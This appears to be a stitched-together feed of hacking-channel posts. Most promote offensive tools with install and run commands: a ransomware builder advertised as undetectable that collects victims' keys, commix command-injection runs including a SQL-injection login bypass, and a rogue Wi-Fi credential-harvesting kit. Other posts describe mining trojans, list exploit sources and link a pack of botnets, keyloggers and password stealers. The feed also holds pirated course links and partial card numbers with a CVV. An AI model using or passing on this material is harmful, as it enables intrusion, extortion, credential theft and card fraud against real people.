▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Client installation under Windows
#Fast Tip
Let's look at what happens when you install the client on Windows. No matter how hidden the process of installing the server, some initial data will still have to be set, explicitly requesting it from the user or setting some default values.

During the installation process of the InterBase client, you need to specify the directory where InterBase will be installed

> let's call it <InterBase root>. Client installation includes the following steps:

1)Copy files included in the client.

2) Register files for sharing.

3) Create registry keys.

4)Registration of the TCP / IP service.

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑GuardMiner mining trojan has recently been active and has the ability to actively attack worms.

1️⃣The Trojan will scan and attack multiple server component vulnerabilities in Redis, Drupal, Hadoop, Spring, thinkphp, WebLogic, SQLServer, Elasticsearch, and Windows and Linux under attack.

2️⃣ The malicious scripts init.ps1 and init.sh are executed in the system, and the malicious script will further download the Monero mining trojan, remove the competitive mining trojan and perform local persistent operation. In the Linux system, use SSH connection and Redis weak password blasting to conduct intranet proliferation attacks.

3️⃣ Init.ps1 attacks the Windows system, downloads the mining process phpupdate.exe from the server, configuration file config.json, scans the attack process networkmanager.exe, persistent script newdat.ps1, mining daemon phpguard.exe, clean script clean .bat.

4️⃣ Init.sh attacks the Linux system, downloads the mining process phpupdate from the server, the configuration file config.json, the persistent script newdat.sh, scans the attack process networkmanager, and mining daemon phpuguard.

5️⃣The three sets of mining pools and wallets used for mining are as follows:
xmr.f2pool.com : 13531
43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfwozyfS520

xmr-eu2.nanopool.org:
14444 43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.v520

randomxmonero.hk.nicehash.com:3380
3HVQkSGfvyyQ8ACpShBhegoKGLuTCMCiAr.v520

....
@UndercodeNews
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A Hackers framework topic git:

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

$ git clone https://github.com/Eitenne/roxysploit.git; cd roxysploit; sudo /bin/bash install

🦑OS :

Arch Linux Working
Kali Linux Working
Ubuntu Working
Debian Working
Centos Not Tested
MacOSX Needs porting
Windows Ha no.

> RUN :

rsf > use Picklock
rsf (plugins/picklock) > help


✅Git TOPIC sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑information gathering :
AngryFuzz3r is a collection of tools for pentesting to gather information and discover vulnerabilities of the targets based on Fuzzedb

🦑FEATURES :

-Fuzz url set from an input file
-Concurrent relative path search
-Configurable number of fuzzing workers
-Fuzz CMS ==> Wordpress,Durpal,Joomla
-Generate reports of the valid paths

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/ihebski/angryFuzzer.git

2️⃣ cd angryFuzzer

3️⃣$ python angryFuzzer.py -h
Usage: angryFuzzer.py options

4️⃣Examples :

> Fuzzing an url with default dictionary

 angryFuzzer.py -u http://127.0.0.1 

> Fuzzing CMS (wp: in this exemple !)

 angryFuzzer.py -u http://127.0.0.1 --cms wp 

> Fuzzing a custom Wordlist

python angryFuzzer.py -u http://127.0.0.1 -w fuzzdb/discovery/predictable-filepaths/php/PHP.txt

✅git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

TOR FRONTING WRITTEN TUTORIAL PDF

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WINDOWS EXPLOITS TUTORIALS SOURCES :

+ Bypassing DEP by returning into HeapCreate - by Toto

+ First public ASLR bypass exploit by using partial overwrite - by Skape

+ Heap spray and bypassing DEP - by Skylined

+ First public exploit that used ROP for bypassing DEP in adobe lib TIFF vulnerability

+ Exploit codes of bypassing browsers memory protections

+ PoC’s on Tokken TokenKidnapping . PoC for 2k3 -part 1 - by Cesar Cerrudo
+ PoC’s on Tokken TokenKidnapping . PoC for 2k8 -part 2 - by Cesar Cerrudo

+ An exploit works from win 3.1 to win 7 - by Tavis Ormandy KiTra0d

+ Old ms08-067 metasploit module multi-target and DEP bypass

+ PHP 6.0 Dev str_transliterate() Buffer overflow – NX + ASLR Bypass

+ SMBv2 Exploit - by Stephen Fewer

+ Microsoft IIS 7.5 remote heap buffer overflow - by redpantz

+ Browser Exploitation Case Study for Internet Explorer 11

✅git 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Game Character Animation in Maya and Unity —1.4 GB—

https://www.pluralsight.com/courses/unity-maya-game-character-animation

https://mega.nz/#F!lE9kDKJY!UTn1ILXl0KygetHERPgGQA

🦑MCSD 70-483 C# Complete Preparation Course + Practice Exams —3.9 GB


https://mega.nz/#F!1INGiAzA!mwuqgGIlzibovFuZ4aGm4w

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑RANSOMWARE 2020 :


FEATURES :

Generate a ransomware payload
With or without GUI payload
FUD (Fully Undetectable by Anti-Virus)
Works on Windows, MacOS and Linux
Super fast encryption with PyCrypto
Compile to EXE, APP or Unix/Linux executable
Custom icon for your EXE payload
Receive keys of victims
Decrypt files
Demo mode (payload won't encrypt anything)
Fullscreen mode (Warning takes over the screen)
Custom warning message for your victim
Custom image in your payload
Ghost mode (Rename by adding .DEMON extention instead of encrypting the files)
Multiple encryption methods
Select file extentions to target
Decide if payload should self-destruct (Console mode feature only)
Decide wich drive to target for encryption (working directory)
Verified server access through port forwarding VPN

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

 clone https://github.com/leonv024/RAASNet.git

2️⃣pip3 install -r requirements.txt

3️⃣python3 RAASNet.py

On Linux, you might need to install these packages:

 apt install python3-tk python3-pil python3-pil.imagetk

Testing connection with remote server:

 Change the host and port in test_socket.py, default is 127.0.0.1 on port 8989
python3 test_socket.py

> for More free tutorials for beginers about it :

https://github.com/leonv024/RAASNet/blob/master/demo/PyCrypto-vs-PyAES_demo_10fps.gif

ENJOY 👍🏻

✅git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑RANSOMWARE TUTORIALS FOR BEGINERS (from git sources)

Ransomware Impact on industry

https://medium.com/@tarcisioma/how-can-a-malware-encrypt-a-company-existence-c7ed584f66b3

How this ransomware encryption scheme works:

https://medium.com/@tarcisioma/ransomware-encryption-techniques-696531d07bb9

How this ransomware works:

https://0x00sec.org/t/how-ransomware-works-and-gonnacry-linux-ransomware/4594

https://medium.com/@tarcisioma/how-ransomware-works-and-gonnacry-linux-ransomware-17f77a549114

Mentions:

https://www.sentinelone.com/blog/sentinelone-detects-prevents-wsl-abuse/

https://hackingvision.com/2017/07/18/gonnacry-linux-ransomware/

https://www.youtube.com/watch?v=gSfa2L158Uw

✅git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What's a Ransomware?

A ransomware is a form of malware that prevent legitimate users from accessing their device or data and asks for a payment in exchange for the stolen functionality. They have been used for mass extortion in various forms, but the most successful seem to be encrypting ransomware: most of the user data are encrypted and the key can be retrieved with a payment to the attacker. To be widely successful a ransomware must fulfill three properties:

Property 1: The hostile binary code must not contain any secret (e.g. deciphering keys). At least not in an easily retrievable form, indeed white box cryptography can be applied to ransomware.

Property 2: Only the author of the attack should be able to decrypt the infected device.

Property 3: Decrypting one device can not provide any useful information for other infected devices, in particular the key must not be shared among them.

🦑Objectives:

 encrypt all user files with AES-256-CBC.
 Random AES key and IV for each file.
 Works even without internet connection.
 Communication with the server to decrypt Client-private-key.
 encrypt AES key with client-public-key RSA-2048.
 encrypt client-private-key with RSA-2048 server-public-key.
 Change computer wallpaper -> Gnome, LXDE, KDE, XFCE.
 Decryptor that communicate to server to send keys.
 python webserver
 Daemon
 Dropper
 Kill databases

THOSE FROM GITHUB SOURCES
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

BIN Amazon Prime Video

: 442756103622xxxx
442756152271xxxx
442756161628xxxx

FECHA: 01/24

CVV : 067

IP : USA

Postal: 11213

Simulate, understand, & visualize data like a data scientist —-431 MB

https://www.udemy.com/course/suv-data-mxc/

https://mega.nz/#F!wgpGXCxL!LzVxZdJKeNxSiV7ry3R1_w

Learning DaVinci Resolve 16 —2.65 GB

https://www.lynda.com/DaVinci-Resolve-tutorials/Learning-DaVinci-Resolve-16/2820131-2.html

https://mega.nz/#F!AoMBySoD!F0YKh-1KI8ImYAB2mlttKA

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Automated All-in-One OS command injection and exploitation tool
Termux-Linux
WHY YOU SHOULD USE THIS TOOL ?
used from web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/commixproject/commix.git

2️⃣cd commix

3️⃣python commix.py -h

4️⃣1. Exploiting Damn Vulnerable Web App:
root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

2. Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"

3. Exploiting OWASP Mutillidae using extra headers and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

4. Exploiting Persistence using ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"

5. Exploiting Persistence using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"

6. Exploiting Kioptrix: Level 1.1 (#2):
root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"

7. Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"

8. Exploiting CVE-2014-6271/Shellshock:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock

9. Exploiting commix-testbed (cookie) using cookie-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"

10. Exploiting commix-testbed (user-agent) using ua-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3

11. Exploiting commix-testbed (referer) using referer-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3

12. Exploiting Flick 2 using custom headers and base64 encoding option:
root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64

13. Exploiting commix-testbed (JSON-based) using JSON POST data:
root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'

14. Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"

🦑OS :

-Kali
-Parrot
-debian
-ubuntu
-termux

✅GIT SOURCES
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Free Port Scanner for Windows
-and How to see who is on your wifi windows ?


Although the title says that Angry IP Scanner is a port scanner for Windows, in fact it is a cross-platform scanner that works great on Linux as well as on Mac. But Linux has Nmap - a powerful network scanner with many options and additional functions for obtaining information about hosts on the network. By the way, Nmap also works on Windows and even has a graphical interface, but many Windows users find it difficult to deal with the command line and numerous Nmap options, and many just don’t need such an abundance of functions (see the article Port Scanner for Windows ).

So, Angry IP Scanner is a simple and intuitive program for finding hosts and scanning ports of computers, sites, servers, phones and any other online devices.

🦑Download : https://angryip.org/download/#windows

#TIPSFORNOOBS
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

A SMALL GIFT FOR UNDERCODE MEMBERS :)

🦑Anti Viruses
🦑BotNets
🦑Botting Programs (Ad Fly, ETC)
🦑Brute forcing Programs
🦑Cracking Programs DDoS
🦑Programs Deface Creators
🦑Doxing Tools eWhore Packs
(Fetish) Exploiting Programs (SQL Map, ParanoicScan, Dedi Exploiter, AirCrack)
🦑Exploit Scanners (GoogleSeacher, Gr3eNox Exploit Scanner, Joomla Security Scanner, Realuike Exploit Scanner, RFI Scanner V2, RFI Tool, Special RFI, SQL Poison, XSS Scanner)
🦑Exploits (Chat Exploits, MSN Hack, System Exploits, Team Speak)
🦑Guides (Anonymity, BotNet, Bruteforce, Cracking, DDoSing, Defacing, Doxing, Exploits, Game Hacking, Hacking, IRL Sh*t, Linux OS, Programming, Random, Reverse Engineering, Security, SQL Injection, Viruses, WiFi Sh*t)
🦑Hacking (Ann Loader, Password Stealers)
🦑Injection Programs (SQL, XSS) MD5 (MD5 Attack, MD5 Toolbox, MD5 Tools)
🦑Sharecash Skype Tools (Reslovers, CenSky Crasher, Florision Tools, James Reborn(V5.7), Pops Skype Tool, Skype API)
🦑Source Codes (Crypter Sources, DDoS Programs, KEYLOGGERS, RAT Sources, RANDOM SH*T)
🦑Tutorials (TOO MANY TO TYPE)
🦑Viruses (Batch Virus Creators,
Binders, Crypters, DNS, Keyloggers, Ratting, Spoofing, Spreading)
🦑VPN'S & Proxies
🦑WiFi Youtube

https://mega.nz/folder/nO5n0DgC#1zjNjDMn8nT0qIruUI30Ow

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

ENJOY 👍🏻

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑UDP VS TCP BY UNDERCODE :

(VPN OPTIONS as example)

The question may arise, why is such an unreliable UDP protocol needed if there is a reliable TCP protocol?


1) The payoff for the reliability of the TCP protocol is what accounting calls “overheads” - the bottom line is that to provide a mechanism for controlling the delivery of packets in the TCP protocol, a lot of data is sent that does not contain useful information, but serves only for installation and connection control.

> For example, to send at least one packet with useful data to TCP, you need to complete a three-stage handshake, which consists in sending 1 special packet from source to destination, receiving 1 packet about the possibility of establishing connections and sending another 1 special packet from the source with confirmation,

2) For this reason, both TCP and UDP are “good” - it is important to use them correctly. For example, when streaming video, it doesn't matter which packet was lost a second or two ago. But when opening a web page, when incomplete data may cause problems with processing the request from the HTTP protocol, on the contrary, you need to monitor the delivery and integrity of each data packet.

🦑A detailed understanding of TCP and UDP matters when:

1️⃣network traffic analysis
2️⃣configure iptables network firewall
3️⃣understanding and protecting against DoS attacks of some kind.

For example, understanding the mechanism of TCP connections, you can configure the iptables so that all new connections will be prohibited while preserving the existing ones, or you can prohibit any incoming connections with full outgoing permission, understand and prevent a number of DoS attacks, understand SYN and other types of scans - why are they possible and what is their mechanism, etc ..

Written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WIFI HACKING -LINUX 2020 :

FEATURES :

Rogue access point attack
Man-in-the-middle attack
Module for deauthentication attack
Module for extra-captiveflask templates
Rogue Dns Server
Captive portal attack (captiveflask)
Intercept, inspect, modify and replay web traffic
WiFi networks scanning
DNS monitoring service
Credentials harvesting
Transparent Proxies
LLMNR, NBT-NS and MDNS poisoner

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣sudo apt install python3.7-dev libssl-dev libffi-dev build-essential python3.7
 
2️⃣$ git clone https://github.com/P0cL4bs/wifipumpkin3.git
 
3️⃣$ cd wifipumpkin3

4️⃣ $ sudo make install

🦑FOR KALI :

1️⃣ $ sudo apt install libssl-dev libffi-dev build-essential

2️⃣ $ git clone https://github.com/P0cL4bs/wifipumpkin3.git
 
3️⃣$ cd wifipumpkin3
now, we need to install the PyQt5, it very easy:

4️⃣sudo apt install python3-pyqt5
or check if the pyqt5 is installed successful:

5️⃣python3 -c "from PyQt5.QtCore import QSettings; print('done')"
now, if you got the message done, nice. the next step is install the wp3:

6️⃣ $ sudo python3 setup.py install

FOR MORE OS INSTALL GO TO https://wifipumpkin3.github.io/docs/getting-started#installation

🦑Tools (pre-installed) :

> iptables (current: iptables v1.6.1)
> iw (current: iw version 4.14)
> net-tools (current: version (1.60+)
> wireless-tools (current: version 30~pre9-12)
> hostapd (current: hostapd v2.6)

7️⃣Once started the tool with sudo wifipumpkin3 , you’ll be presented with an interactive session like the metasploit framework where you can enable or disable modules, plugin, proxy configure the ap and etc

> MORE USAGE : CHECK HERE

✅Git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁